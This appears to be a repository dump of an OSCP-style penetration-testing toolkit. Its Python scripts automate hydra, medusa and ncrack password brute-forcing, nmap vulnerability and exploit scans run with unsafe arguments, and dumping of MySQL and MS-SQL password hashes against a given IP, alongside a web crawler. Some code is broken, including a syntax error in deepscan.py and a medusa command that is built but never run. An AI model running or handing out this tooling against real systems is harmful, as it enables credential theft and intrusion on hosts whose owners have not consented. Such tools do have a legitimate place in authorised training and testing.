├── README.md ├── brutepwd.py ├── crawler.py ├── deepscan.py ├── dirbust.py ├── dnsrecon.org ├── dnsrecon.py ├── exploitdb.txt ├── f.py ├── f1.py ├── ftpbust.py ├── ftpcompromise.py ├── ftprecon.py ├── gogolab.sh ├── nmapxml.py ├── nmapxml.pyc ├── oportscan.py ├── passwords.txt ├── recon.conf ├── reconf.py ├── reconf.pyc ├── reconscan.py ├── rpcrecon.py ├── setup.py ├── smbrecon.py ├── smtprecon.py ├── snmprecon.py ├── sshrecon.py ├── support.txt ├── t.py ├── t1.py ├── users.txt ├── vulnrecon.py └── winrmrecon.py /README.md: -------------------------------------------------------------------------------- 1 | # oscp 2 | 3 | https://drive.google.com/folderview?id=0B8BpJ_bHwXSKZ2ZiR1FQTHNoOEk&usp=sharing&tid=0B8BpJ_bHwXSKak0xRjdnaWFiYzg 4 | -------------------------------------------------------------------------------- /brutepwd.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import multiprocessing 4 | from multiprocessing import * 5 | import os 6 | import sys 7 | import re 8 | import reconf 9 | from reconf import * 10 | import time 11 | from functools import wraps 12 | import argparse 13 | import ipaddr 14 | import nmapxml 15 | from nmapxml import * 16 | import threading 17 | from easyprocess import EasyProcess 18 | 19 | parser = argparse.ArgumentParser(description='Run a short or verbose dirb scan') 20 | parser.add_argument('-ip', action='store', required=True, help='IP Address to be assessed') 21 | parser.add_argument('-s', action='store', required=True, help='Service') 22 | parser.add_argument('-a', action='store_true', required=False, help='ALL') 23 | parser.add_argument('-hy', action='store_true', required=False, help='hydra') 24 | parser.add_argument('-n', action='store_true', required=False, help='ncrack') 25 | parser.add_argument('-m', action='store_true', required=False, help='medusa') 26 | 27 | args = parser.parse_args() 28 | try: 29 | ip_address = 
ipaddr.IPAddress(args.ip)
except:
    # NOTE(review): a bare except hides the real cause -- a malformed -ip value
    # and a missing `ipaddr` module both surface as the same "Try again...".
    print "Try again..."
    sys.exit()

# Service name to check; it must match the spelling each tool expects.
stype = args.s

def chkcreds(EXECMD, TOUT=300):
    """Run one credential-check command line and wait for it to finish.

    EXECMD -- the complete command line, handed to EasyProcess as-is
    TOUT   -- seconds EasyProcess waits before giving up on the command

    Returns None. The captured stdout is bound to a local (`proc`) and then
    dropped, and try/finally with a bare `pass` neither catches nor reports
    anything, so a timeout or a tool failure leaves no trace here; the only
    record of a run is the file the tool itself writes (-O / -oA / -o).
    """
    #subprocess.call(EXECMD, shell=True)
    try:
        proc = EasyProcess(EXECMD).call(timeout=TOUT).stdout
    finally:
        pass

# `and` binds tighter than `or`, so each guard below reads as
# "-a, or this one tool selected on its own": -a runs every tool that
# knows the requested service.
# Each run tries a user list against a password list on one host -- exactly
# the failed-logon volume that account-lockout thresholds and auth-failure
# alerting on the target are meant to surface.
if args.a is True or args.m is True and args.hy is False and args.n is False:
    medusasrv = ['csv','ftp','http','imap','mssql','mysql','nntp','pcanywhere','pop3','postgres','rexec','rlogin','rsh','smb','smtp','snmp','ssh','svn','telnet','vmauthd','vnc','web']
    if stype in medusasrv:
        # try/finally: pass is a no-op; errors from chkcreds propagate as before.
        try:
            outfile = "%s/%s_%s_medusa.txt" % (reconf.rsltpth, ip_address, stype)
            MEDUSA = "medusa -h %s -U %s -P %s -O %s -e ns -v 4 -M %s" % (ip_address, reconf.usrlst, reconf.pwdlst, outfile, stype)
            print "\033[1;31m[>]\033[0;m Executing %s" % MEDUSA
            chkcreds(MEDUSA, 300)
        finally:
            pass

if args.a is True or args.n is True and args.hy is False and args.m is False:
    ncracksrv = ['ftp', 'ssh', 'telnet', 'http', 'pop3', 'smb', 'rdp', 'vnc']
    if stype in ncracksrv:
        try:
            outfile = "%s/%s_%s_ncrack.txt" % (reconf.rsltpth, ip_address, stype)
            # NOTE(review): `-p` appears twice on this command line (service,
            # then password list); confirm the flags against the ncrack manual
            # before trusting this run's output file.
            NCRACK = "ncrack -p %s -u %s -p %s -T4 -oA %s %s" % (stype, reconf.usrlst, reconf.pwdlst, outfile, ip_address)
            print "\033[1;31m[>]\033[0;m Executing %s" % NCRACK
            chkcreds(NCRACK, 300)
        finally:
            pass

if args.a is True or args.hy is True and args.n is False and args.m is False:
    hydrasrv = ['cisco', 'cisco-enable', 'cvs', 'firebird', 'ftp', 'ftps', 'http', 'icq', 'imap', 'irc', 'ldap2', 'ldap3', 'mssql', 'mysql', 'nntp', 'oracle-listener', 'oracle-sid', 'pcanywhere', 'pcnfs', 'pop3', 'postgres', 'rdp', 'redis', 'rexec', 'rlogin', 'rsh', 's7', 'sip', 'smb', 'smtp', 'smtp-enum', 'snmp', 'socks5', 'ssh', 'sshkey', 'svn', 'teamspeak', 'telnet', 'vmauthd', 'vnc', 'xmpp']
    if stype in hydrasrv:
        try:
            outfile = "%s/%s_%s_hydra.txt" % (reconf.rsltpth, ip_address, 
stype) 70 | HYDRA = "hydra -L %s -P %s -q -e ns -o %s %s %s" % (reconf.usrlst, reconf.pwdlst, outfile, ip_address, stype) 71 | chkcreds(HYDRA, 300) 72 | finally: 73 | pass 74 | -------------------------------------------------------------------------------- /crawler.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | """ This is a modified version of James Mills' original recipe. """ 4 | 5 | import re 6 | import sys 7 | import time 8 | import math 9 | import urllib2 10 | import urlparse 11 | import optparse 12 | import hashlib 13 | from cgi import escape 14 | from traceback import format_exc 15 | from Queue import Queue, Empty as QueueEmpty 16 | 17 | from bs4 import BeautifulSoup 18 | 19 | class Link (object): 20 | 21 | def __init__(self, src, dst, link_type): 22 | self.src = src 23 | self.dst = dst 24 | self.link_type = link_type 25 | 26 | def __hash__(self): 27 | return hash((self.src, self.dst, self.link_type)) 28 | 29 | def __eq__(self, other): 30 | return (self.src == other.src and 31 | self.dst == other.dst and 32 | self.link_type == other.link_type) 33 | 34 | def __str__(self): 35 | return self.src + " -> " + self.dst 36 | 37 | class Crawler(object): 38 | 39 | def __init__(self, root, depth_limit, confine=None, exclude=[], locked=True, filter_seen=True): 40 | self.root = root 41 | self.host = urlparse.urlparse(root)[1] 42 | 43 | ## Data for filters: 44 | self.depth_limit = depth_limit # Max depth (number of hops from root) 45 | self.locked = locked # Limit search to a single host? 
46 | self.confine_prefix=confine # Limit search to this prefix 47 | self.exclude_prefixes=exclude; # URL prefixes NOT to visit 48 | 49 | 50 | self.urls_seen = set() # Used to avoid putting duplicates in queue 51 | self.urls_remembered = set() # For reporting to user 52 | self.visited_links= set() # Used to avoid re-processing a page 53 | self.links_remembered = set() # For reporting to user 54 | 55 | self.num_links = 0 # Links found (and not excluded by filters) 56 | self.num_followed = 0 # Links followed. 57 | 58 | # Pre-visit filters: Only visit a URL if it passes these tests 59 | self.pre_visit_filters=[self._prefix_ok, 60 | self._exclude_ok, 61 | self._not_visited, 62 | self._same_host] 63 | 64 | # Out-url filters: When examining a visited page, only process 65 | # links where the target matches these filters. 66 | if filter_seen: 67 | self.out_url_filters=[self._prefix_ok, 68 | self._same_host] 69 | else: 70 | self.out_url_filters=[] 71 | 72 | def _pre_visit_url_condense(self, url): 73 | 74 | """ Reduce (condense) URLs into some canonical form before 75 | visiting. All occurrences of equivalent URLs are treated as 76 | identical. 77 | 78 | All this does is strip the \"fragment\" component from URLs, 79 | so that http://foo.com/blah.html\#baz becomes 80 | http://foo.com/blah.html """ 81 | 82 | base, frag = urlparse.urldefrag(url) 83 | return base 84 | 85 | ## URL Filtering functions. These all use information from the 86 | ## state of the Crawler to evaluate whether a given URL should be 87 | ## used in some context. Return value of True indicates that the 88 | ## URL should be used. 
# crawler.py, inside class Crawler (header above): URL filters and crawl().
    def _prefix_ok(self, url):
        """Pass if the URL has the correct prefix, or none is specified."""
        return (self.confine_prefix is None or
                url.startswith(self.confine_prefix))

    def _exclude_ok(self, url):
        """Pass if the URL starts with none of the exclude prefixes.

        With an empty exclude list every URL passes (all([]) is True).
        """
        prefixes_ok = [ not url.startswith(p) for p in self.exclude_prefixes]
        return all(prefixes_ok)

    def _not_visited(self, url):
        """Pass if the URL has not already been visited."""
        return (url not in self.visited_links)

    def _same_host(self, url):
        """Pass if the URL is on the same host as the root URL.

        Returns a match object (truthy) or None/False; callers only test
        truthiness.

        NOTE(review): self.host is interpolated into the pattern unescaped
        and re.match only anchors at the start, so any netloc that merely
        contains the root host text passes (and each '.' in it matches any
        character). A link found on a crawled page can therefore pull the
        crawl onto a different host; an exact netloc comparison would keep
        it in scope.
        """
        try:
            host = urlparse.urlparse(url)[1]
            return re.match(".*%s" % self.host, host)
        except Exception, e:
            print >> sys.stderr, "ERROR: Can't process url '%s' (%s)" % (url, e)
            return False


    def crawl(self):

        """ Main function in the crawling process. Core algorithm is:

        q <- starting page
        while q not empty:
           url <- q.get()
           if url is new and suitable:
              page <- fetch(url)
              q.put(urls found in page)
           else:
              nothing

        "new and suitable" means the URL passed every pre_visit_filter
        (prefix, exclude list, not yet visited, same host) and is within
        depth_limit hops of the root. No threads are involved; the Queue
        is only used as a FIFO. """

        q = Queue()
        q.put((self.root, 0))

        while not q.empty():
            this_url, depth = q.get()

            #Non-URL-specific filter: Discard anything over depth limit
            if depth > self.depth_limit:
                continue

            #Apply URL-based filters. Collect the filters that rejected the URL.
            do_not_follow = [f for f in self.pre_visit_filters if not f(this_url)]

            #Special-case depth 0 (starting URL)
            # NOTE(review): the message (continued on the next line) is passed
            # with a comma rather than %, so "%s" is printed literally and the
            # filter list follows it as a separate print argument.
            if depth == 0 and [] != do_not_follow:
                print >> sys.stderr, "Whoops! 
Starting URL %s rejected by the following filters:", do_not_follow 147 | 148 | #If no filters failed (that is, all passed), process URL 149 | if [] == do_not_follow: 150 | try: 151 | self.visited_links.add(this_url) 152 | self.num_followed += 1 153 | page = Fetcher(this_url) 154 | page.fetch() 155 | for link_url in [self._pre_visit_url_condense(l) for l in page.out_links()]: 156 | if link_url not in self.urls_seen: 157 | q.put((link_url, depth+1)) 158 | self.urls_seen.add(link_url) 159 | 160 | do_not_remember = [f for f in self.out_url_filters if not f(link_url)] 161 | if [] == do_not_remember: 162 | self.num_links += 1 163 | self.urls_remembered.add(link_url) 164 | link = Link(this_url, link_url, "href") 165 | if link not in self.links_remembered: 166 | self.links_remembered.add(link) 167 | except Exception, e: 168 | print >>sys.stderr, "ERROR: Can't process url '%s' (%s)" % (this_url, e) 169 | #print format_exc() 170 | 171 | class OpaqueDataException (Exception): 172 | def __init__(self, message, mimetype, url): 173 | Exception.__init__(self, message) 174 | self.mimetype=mimetype 175 | self.url=url 176 | 177 | 178 | class Fetcher(object): 179 | 180 | """The name Fetcher is a slight misnomer: This class retrieves and interprets web pages.""" 181 | 182 | def __init__(self, url): 183 | self.url = url 184 | self.out_urls = [] 185 | 186 | def __getitem__(self, x): 187 | return self.out_urls[x] 188 | 189 | def out_links(self): 190 | return self.out_urls 191 | 192 | #def _addHeaders(self, request): 193 | # request.add_header("User-Agent", AGENT) 194 | 195 | def _open(self): 196 | url = self.url 197 | try: 198 | request = urllib2.Request(url) 199 | handle = urllib2.build_opener() 200 | except IOError: 201 | return None 202 | return (request, handle) 203 | 204 | def fetch(self): 205 | request, handle = self._open() 206 | #self._addHeaders(request) 207 | if handle: 208 | try: 209 | data=handle.open(request) 210 | mime_type=data.info().gettype() 211 | url=data.geturl(); 212 
# crawler.py, inside Fetcher.fetch(): remainder of the try block begun above.
                if mime_type != "text/html":
                    # Anything that is not HTML is skipped by the handler below.
                    raise OpaqueDataException("Not interested in files of type %s" % mime_type,
                                              mime_type, url)
                # NOTE(review): the whole body is read into memory with no size
                # cap, and the open() above sets no timeout; a slow or very
                # large response from the crawled site stalls or bloats the
                # crawler.
                content = unicode(data.read(), "utf-8",
                        errors="replace")
                soup = BeautifulSoup(content)
                tags = soup('a')
            except urllib2.HTTPError, error:
                if error.code == 404:
                    print >> sys.stderr, "ERROR: %s -> %s" % (error, error.url)
                else:
                    print >> sys.stderr, "ERROR: %s" % error
                tags = []
            except urllib2.URLError, error:
                print >> sys.stderr, "ERROR: %s" % error
                tags = []
            except OpaqueDataException, error:
                print >>sys.stderr, "Skipping %s, has type %s" % (error.url, error.mimetype)
                tags = []
            for tag in tags:
                href = tag.get("href")
                if href is not None:
                    # NOTE(review): cgi.escape HTML-escapes the href before it
                    # is joined, so an href whose query string contains '&'
                    # is stored with '&amp;' and will not resolve as written.
                    url = urlparse.urljoin(self.url, escape(href))
                    # `in self` falls back to __getitem__ (no __contains__):
                    # a linear scan of out_urls for every link.
                    if url not in self:
                        self.out_urls.append(url)

def getLinks(url):
    """Fetch one page and print, numbered from 1, each out-link containing "http".

    The loop variable below shadows the `url` parameter once iteration
    starts. The triple-quoted block after fetch() is a leftover string
    literal, not a docstring; it has no effect.
    """
    page = Fetcher(url)
    page.fetch()
    """for i, url in enumerate(page):
        print "%d. %s" % (i, url) """
    j = 1
    for i, url in enumerate(page):
        if url.find("http")>=0:
            print "%d. %s" % (j, url)
            j = j + 1

def parse_options():
    """parse_options() -> opts, args

    Parse any command-line options given returning both
    the parsed options and arguments. 
254 | """ 255 | 256 | parser = optparse.OptionParser() 257 | 258 | parser.add_option("-q", "--quiet", 259 | action="store_true", default=False, dest="quiet", 260 | help="Enable quiet mode") 261 | 262 | parser.add_option("-l", "--links", 263 | action="store_true", default=False, dest="links", 264 | help="Get links for specified url only") 265 | 266 | parser.add_option("-d", "--depth", 267 | action="store", type="int", default=30, dest="depth_limit", 268 | help="Maximum depth to traverse") 269 | 270 | parser.add_option("-c", "--confine", 271 | action="store", type="string", dest="confine", 272 | help="Confine crawl to specified prefix") 273 | 274 | parser.add_option("-x", "--exclude", action="append", type="string", 275 | dest="exclude", default=[], help="Exclude URLs by prefix") 276 | 277 | parser.add_option("-L", "--show-links", action="store_true", default=False, 278 | dest="out_links", help="Output links found") 279 | 280 | parser.add_option("-u", "--show-urls", action="store_true", default=False, 281 | dest="out_urls", help="Output URLs found") 282 | 283 | parser.add_option("-D", "--dot", action="store_true", default=False, 284 | dest="out_dot", help="Output Graphviz dot file") 285 | 286 | 287 | 288 | opts, args = parser.parse_args() 289 | 290 | if len(args) < 1: 291 | parser.print_help(sys.stderr) 292 | raise SystemExit, 1 293 | 294 | if opts.out_links and opts.out_urls: 295 | parser.print_help(sys.stderr) 296 | parser.error("options -L and -u are mutually exclusive") 297 | 298 | return opts, args 299 | 300 | class DotWriter: 301 | 302 | """ Formats a collection of Link objects as a Graphviz (Dot) 303 | graph. 
Mostly, this means creating a node for each URL with a
    name which Graphviz will accept, and declaring links between those
    nodes."""

    def __init__ (self):
        # url -> generated node name; also records which nodes were declared.
        self.node_alias = {}

    def _safe_alias(self, url, silent=False):

        """Translate URLs into unique strings guaranteed to be safe as
        node names in the Graphviz language. Currently, that's based
        on the md5 digest, in hexadecimal.

        On first sight of a URL the node declaration is printed as a side
        effect (unless silent); later calls just return the cached name.

        NOTE(review): the URL is written into the label attribute
        unescaped. A crawled link containing a double quote or backslash
        (content the crawled site controls) breaks, or injects into, the
        emitted Dot source; escape it before printing. MD5 serves only as
        a name generator here, not as a security control.
        """

        if url in self.node_alias:
            return self.node_alias[url]
        else:
            m = hashlib.md5()
            m.update(url)
            name = "N"+m.hexdigest()
            self.node_alias[url]=name
            if not silent:
                print "\t%s [label=\"%s\"];" % (name, url)
            return name


    def asDot(self, links):

        """ Render a collection of Link objects as a Dot graph on stdout.

        Node declarations are emitted lazily by _safe_alias while the edges
        are written, so they appear interleaved with the edge lines. """

        print "digraph Crawl {"
        print "\t edge [K=0.2, len=0.1];"
        for l in links:
            print "\t" + self._safe_alias(l.src) + " -> " + self._safe_alias(l.dst) + ";"
        print "}"




def main():
    """Command-line entry point: parse options, crawl, print the requested report."""
    opts, args = parse_options()

    url = args[0]

    if opts.links:
        # -l: list one page's links and stop.
        getLinks(url)
        raise SystemExit, 0

    depth_limit = opts.depth_limit
    confine_prefix=opts.confine
    exclude=opts.exclude

    sTime = time.time()

    print >> sys.stderr, "Crawling %s (Max Depth: %d)" % (url, depth_limit)
    crawler = Crawler(url, depth_limit, confine_prefix, exclude)
    crawler.crawl()

    if opts.out_urls:
        print "\n".join(crawler.urls_seen)

    if opts.out_links:
        print "\n".join([str(l) for l in crawler.links_remembered])

    if opts.out_dot:
        d = DotWriter()
        d.asDot(crawler.links_remembered)

    eTime = time.time()
    tTime = eTime - sTime

    print >> sys.stderr, "Found: %d" % crawler.num_links
    print >> sys.stderr, "Followed: %d" % crawler.num_followed
    # NOTE(review): the rate printed next divides by tTime, which is 0.0 when
    # the crawl finishes within the clock's resolution -> ZeroDivisionError.
    print >> sys.stderr, 
"Stats: (%d/s after %0.2fs)" % ( 376 | int(math.ceil(float(crawler.num_links) / tTime)), tTime) 377 | 378 | if __name__ == "__main__": 379 | main() 380 | -------------------------------------------------------------------------------- /deepscan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import xml.etree.ElementTree 3 | from libnmap.parser import NmapParser 4 | import subprocess 5 | from subprocess import * 6 | import sys 7 | import os 8 | import re 9 | import reconf 10 | from reconf import * 11 | 12 | if len(sys.argv) != 2: 13 | print "Usage: deeprecon.py " 14 | sys.exit(0) 15 | 16 | ip_address = sys.argv[1].strip() 17 | 18 | def chkfolders(): 19 | dpths = [reconf.rootpth,reconf.labpath,reconf.rsltpth,reconf.exampth,reconf.nmappth] 20 | for dpth in dpths: 21 | if not os.path.exists(dpth): 22 | os.makedirs(dpth) 23 | 24 | def multProc(targetin, scanip, port): 25 | jobs = [] 26 | p = multiprocessing.Process(target=targetin, args=(scanip,port)) 27 | jobs.append(p) 28 | p.start() 29 | return 30 | 31 | def dnsEnum(ip_address, port): 32 | print "INFO: Detected DNS on %s %s" % (ip_address, port) 33 | if port.strip() == "53": 34 | SCRIPT = "./dnsrecon.py -ip %s" % (ip_address) 35 | subprocess.call(SCRIPT, shell=True) 36 | return 37 | 38 | def searchsploitEnum(ip_address): 39 | print "INFO: Searching for known exploits for %s" % (ip_address) 40 | SCRIPT = "./vulnrecon.py %s" % (ip_address) 41 | subprocess.call(SCRIPT, shell=True) 42 | return 43 | 44 | def httpEnum(ip_address, port): 45 | print "INFO: Gathering additional HTTP information %s:%s" % (ip_address, port) 46 | HTTPSCAN = "nmap -Pn -n -vv -sC -p %s --script=%s -oA %s/%s_http %s" % (port, reconf.httpnse, reconf.exampth, ip_address, ip_address) 47 | results = subprocess.check_output(HTTPSCAN, shell=True) 48 | HTTPHDRS = "nmap -Pn -n -vv -p %s --script=%s -oA %s/%s_%s_httpheader %s" % (port, 'http-headers', reconf.exampth, ip_address, port, 
ip_address)
    results = subprocess.check_output(HTTPHDRS, shell=True)

def httpsEnum(ip_address, port):
    """Run the configured HTTP NSE set and http-headers against an HTTPS port.

    nmap -oA writes <ip>_https and <ip>_<port>_httpheader under
    reconf.exampth. check_output raises CalledProcessError on a non-zero
    exit and nothing here catches it; `results` is assigned but never used.
    ip_address comes straight from argv (module top) and is spliced into
    shell=True command lines unvalidated -- operator-controlled, but the
    ipaddr check used by the sibling scripts would be a cheap guard.
    """
    print "INFO: Gathering additional HTTPS information %s:%s" % (ip_address, port)
    HTTPSCANS = "nmap -Pn -n -vv -sC -p %s --script=%s -oA %s/%s_https %s" % (port, reconf.httpnse, reconf.exampth, ip_address, ip_address)
    results = subprocess.check_output(HTTPSCANS, shell=True)
    HTTPHDRS = "nmap -Pn -n -vv -p %s --script=%s -oA %s/%s_%s_httpheader %s" % (port, 'http-headers', reconf.exampth, ip_address, port, ip_address)
    results = subprocess.check_output(HTTPHDRS, shell=True)

def hgreEnum(ip_address, port):
    """Run nmap's http-grep builtins against one port; output <ip>_httpgrep."""
    print "INFO: Searching for sensitive information on %s:%s" % (ip_address, port)
    HTTPGREP = "nmap -Pn -n -vv -oA %s/%s_httpgrep -p %s %s --script http-grep --script-args http-grep.builtins" % (reconf.exampth, ip_address, port, ip_address)
    results = subprocess.check_output(HTTPGREP, shell=True)

def niktoEnum(ip_address, port)
    # NOTE(review): the def line above has no trailing colon -- a SyntaxError,
    # so the whole module fails to compile and none of deepscan runs until it
    # is fixed. Unlike the other scans, output goes to "<ip>._nikto" in the
    # current directory via a shell redirect rather than under reconf.exampth.
    print "INFO: Performing Nikto scan on %s:%s" % (ip_address, port)
    NIKTOSCAN = "nikto -host %s -p %s > %s._nikto" % (ip_address, port, ip_address)
    results = subprocess.check_output(NIKTOSCAN, shell=True)

def dirbEnum(ip_address):
    """Hand off to ./dirbust.py -ss (relative to the cwd) for this host."""
    print "INFO: Brute force dictionary attack for directories on %s" % (ip_address)
    DIRBUST = "./dirbust.py -ip %s -ss" % (ip_address)
    subprocess.call(DIRBUST, shell=True)

def oracleEnum(ip_address, port):
    """Run the oracle NSE scripts against one port; output <ip>_oracle.xml.* (-oA)."""
    print "INFO: Detected Oracle on %s:%s" % (ip_address, port)
    ORACLESCAN = "nmap -vv -Pn -p %s --script=oracle-enum-users,oracle-sid-brute -oA %s/%s_oracle.xml %s" % (port, reconf.exampth, ip_address, ip_address)
    results = subprocess.check_output(ORACLESCAN, shell=True)

def mssqlEnum(ip_address, port):
    """Run the ms-sql NSE scripts against one port; output <ip>_mssql.xml.* (-oA)."""
    print "INFO: Detected MS-SQL on %s:%s" % (ip_address, port)
    print "INFO: Performing nmap mssql script scan for %s:%s" % (ip_address, port)
    MSSQLSCAN = "nmap -vv -Pn -p 
%s --script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes --script-args=mssql.instance-port=1433,smsql.username-sa,mssql.password-sa -oA %s/%s_mssql.xml %s" % (port, reconf.exampth, ip_address, ip_address) 82 | subprocess.call(MSSQLSCAN, shell=True) 83 | 84 | def mysqlEnum(ip_address, port): 85 | print "INFO: Detected MySQL on %s:%s" % (ip_address, port) 86 | print "INFO: Performing nmap mssql script scan for %s:%s" % (ip_address, port) 87 | MYSQLSCAN = "nmap -vv -Pn -p %s --script=mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 -oA %s/%s_mysql.xml %s" % (port, reconf.exampth, ip_address, ip_address) 88 | subprocess.call(MYSQLSCAN, shell=True) 89 | HYDRA = "hydra -L %s -P %s -f -t 1 -o %s/%s_mysqlhydra.txt %s mysql" % (reconf.usrlst, reconf.pwdlst, reconf.exampth, ip_address, ip_address) 90 | results = subprocess.check_output(HYDRA, shell=True) 91 | resultarr = results.split("\n") 92 | for result in resultarr: 93 | if "login:" in result: 94 | print "[*] Valid ftp credentials found: " + result 95 | MEDUSA = "medusa -L %s -P %s -f -t 1 -o %s/%s_mysqlhydra.txt %s mysql" % (reconf.usrlst, reconf.pwdlst, reconf.exampth, ip_address, ip_address) 96 | results = subprocess.check_output(HYDRA, shell=True) 97 | resultarr = results.split("\n") 98 | for result in resultarr: 99 | if "login:" in result: 100 | print "[*] Valid ftp credentials found: " + result 101 | 102 | 103 | def sshEnum(ip_address, port): 104 | print "INFO: Detected SSH on %s:%s" % (ip_address, port) 105 | SCRIPT = "./sshrecon.py %s %s" % (ip_address, port) 106 | subprocess.call(SCRIPT, shell=True) 107 | return 108 | 109 | def snmpEnum(ip_address, port): 110 | print "INFO: Detected snmp on %s:%s" % (ip_address, port) 111 | SCRIPT = "./snmprecon.py %s" % (ip_address) 112 | subprocess.call(SCRIPT, shell=True) 113 | return 114 | 115 | def smtpEnum(ip_address, port): 116 | print "INFO: Detected smtp on %s:%s" % 
(ip_address, port)
    # Only the standard port is handed to smtprecon; anything else is logged.
    if port.strip() == "25":
        SCRIPT = "./smtprecon.py %s" % (ip_address)
        subprocess.call(SCRIPT, shell=True)
    else:
        print "WARNING: SMTP detected on non-standard port, smtprecon skipped (must run manually)"
    return

def smbEnum(ip_address, port):
    """Hand off to ./smbrecon.py (relative to the cwd); `port` is only printed."""
    print "INFO: Detected SMB on %s:%s" % (ip_address, port)
    SCRIPT = "./smbrecon.py %s" % (ip_address)
    subprocess.call(SCRIPT, shell=True)
    return

def tbdEnum(tbd):
    """Placeholder for services with no handler yet: print and return."""
    print "\033[1;31m[!]\033[1;m To be developed: %s" % (tbd)
    return

def ftpEnum(ip_address, port):
    """Hand off to ./ftprecon.py (relative to the cwd) with host and port."""
    print "INFO: Detected ftp on %s:%s" % (ip_address, port)
    SCRIPT = "./ftprecon.py %s %s" % (ip_address, port)
    subprocess.call(SCRIPT, shell=True)
    return

def altOSEnum(ip_address):
    """Return the text after the first "Running" line's ':' from nmap -O.

    Returns None when no line matches; the caller at the bottom of this
    module then passes None to re.match, which raises TypeError.
    """
    print "INFO: Alternative OS detection for %s" % (ip_address)
    OSTRY = "nmap -O --osscan-guess %s" % (ip_address)
    results = subprocess.check_output(OSTRY, shell=True)
    rsltarray = results.split('\n')
    for line in rsltarray:
        if re.search('Running',line):
            return line.split(':')[1].strip()

def opnPORTS(ip_address):
    """Return the open port numbers from <exampth>/<ip>.nmap as "p1,p2,...".

    NOTE(review): when the .nmap file is missing, `results` is never assigned,
    the UnboundLocalError on `return results` is swallowed by the bare
    except, and the function returns None. Callers compare the result to ""
    so they take the "-p %s" branch with the string "None". The shell
    pipeline also re-parses the text output even though the XML from the
    same nmap run is parsed later in this module.
    """
    try:
        fnmap = "%s/%s.nmap" % (reconf.exampth, ip_address)
        print "\033[1;31m [!] \033[0;m Parsing %s for identifying open ports" % (fnmap)
        if os.path.isfile(fnmap):
            CATS = "cat %s | grep open | cut -d'/' -f1 | sort -h | tr '\n' ','" % (fnmap)
            results = subprocess.check_output(CATS, shell=True)
            results = results.rstrip(',')
        else:
            print "\033[1;38m [!] \033[0;m %s is missing. Run nmap with the -oA option" % (fnmap)
        return results
    except:
        pass

def vulnCHK(ip_address):
    oprts = opnPORTS(ip_address)
    print "\033[1;31m [!] 
\033[0;m Ports found: %s " % (oprts) 166 | if oprts == "": 167 | VCHK = "nmap -sV -vv -A -sC -Pn -n --script vuln --script-args=unsafe=1 -oA '%s/%s_vuln' %s" % (reconf.exampth, ip_address, ip_address) 168 | else: 169 | VCHK = "nmap -sV -vv -A -sC -Pn -n -p %s --script vuln --script-args=unsafe=1 -oA '%s/%s_vuln' %s" % (oprts, reconf.exampth, ip_address, ip_address) 170 | print "[+] Executing - %s" % (VCHK) 171 | print "\033[1;33m[*]\033[0;m Running general vuln scans for " + ip_address 172 | subprocess.call(VCHK, shell=True) 173 | 174 | def exploitCHK(ip_address): 175 | oprts = opnPORTS(ip_address) 176 | print "\033[1;31m [!] \033[0;m Ports found: %s " % (oprts) 177 | if oprts == "": 178 | ECHK = "nmap -sV -vv -Pn -n --script exploit --script-args=unsafe=1 -oA '%s/%s_exploit' %s" % (reconf.exampth, ip_address, ip_address) 179 | else: 180 | ECHK = "nmap -sV -vv -Pn -n -p %s --script exploit --script-args=unsafe=1 -oA '%s/%s_exploit' %s" % (oprts, reconf.exampth, ip_address, ip_address) 181 | print "[+] Executing - %s" % (ECHK) 182 | print "\033[1;33m[*]\033[0;m Attempting to exploit " + ip_address 183 | subprocess.call(ECHK, shell=True) 184 | 185 | if __name__=='__main__': 186 | 187 | vulnCHK(ip_address) 188 | exploitCHK(ip_address) 189 | 190 | print "[*] Parsing %s/%s.xml" % (reconf.exampth, ip_address) 191 | xmlfile = "%s/%s.xml" % (reconf.exampth, ip_address) 192 | tree = xml.etree.ElementTree.parse(xmlfile) 193 | 194 | rep = NmapParser.parse_fromfile(xmlfile) 195 | for _host in rep.hosts: 196 | host = ', '.join(_host.hostnames) 197 | ip = (_host.address) 198 | 199 | serv = [] 200 | for attb in tree.iter('service'): 201 | #print attb.attrib 202 | name = attb.attrib.get('name') 203 | serv.append(name) 204 | 205 | try: 206 | for osmatch in _host.os.osmatches: 207 | osys = osmatch.name 208 | except IOError: 209 | osys = 'Microsoft' 210 | else: 211 | osys = altOSEnum(ip_address) 212 | 213 | print "OS: %s" % (osys) 214 | 215 | if re.match('Microsoft', osys) and osys 
!= "": 216 | cnt=0 217 | for services in _host.services: 218 | print 219 | print "\033[1;33m[+]\033[1;m Port: "'{0: <5}'.format(services.port), "Service: "'{0: <10}'.format(serv[cnt]) 220 | print 221 | # 21 222 | if re.search('ftp', serv[cnt]): 223 | print "[+] Running ftpEnum %s, %s" % (ip_address, services.port) 224 | ftpEnum(ip_address, services.port) 225 | # 22 226 | if re.search('ssh',serv[cnt]): 227 | print "[+] Running sshEnum %s, %s" % (ip_address, services.port) 228 | sshEnum(ip_address, services.port) 229 | # 25 230 | if re.search('smtp',serv[cnt]): 231 | print "[+] Running smtpEnum %s, %s" % (ip_address, services.port) 232 | smtpEnum(ip_address, services.port) 233 | # 53 234 | if re.search('domain',serv[cnt]): 235 | print "[+] Running dnsEnum %s, %s" % (ip_address, services.port) 236 | dnsEnum(ip_address, services.port) 237 | # 80 238 | if not re.search('https',serv[cnt]) and re.search('http',serv[cnt]): 239 | print "[+] Running httpEnum %s, %s" % (ip_address, services.port) 240 | httpEnum(ip_address, services.port) 241 | hgreEnum(ip_address, services.port) 242 | # 135 243 | if re.search('msrpc', serv[cnt]): 244 | print "[+] Running rpcEnum %s, %s" % (ip_address, services.port) 245 | tbdEnum(serv[cnt]) 246 | # 139 247 | if re.search('netbios-ssn', serv[cnt]): 248 | print "[+] Running rpcEnum %s, %s" % (ip_address, services.port) 249 | tbdEnum(serv[cnt]) 250 | # 161-162 251 | if re.search('snmp',serv[cnt]): 252 | print "[+] Running snmpEnum %s, %s" % (ip_address, services.port) 253 | snmpEnum(ip_address, services.port) 254 | # 443 255 | if re.search('https',serv[cnt]) or re.search('ssl\/http',serv[cnt]): 256 | print "[+] Running httpsEnum %s, %s" % (ip_address, services.port) 257 | httpsEnum(ip_address, services.port) 258 | hgreEnum(ip_address, services.port) 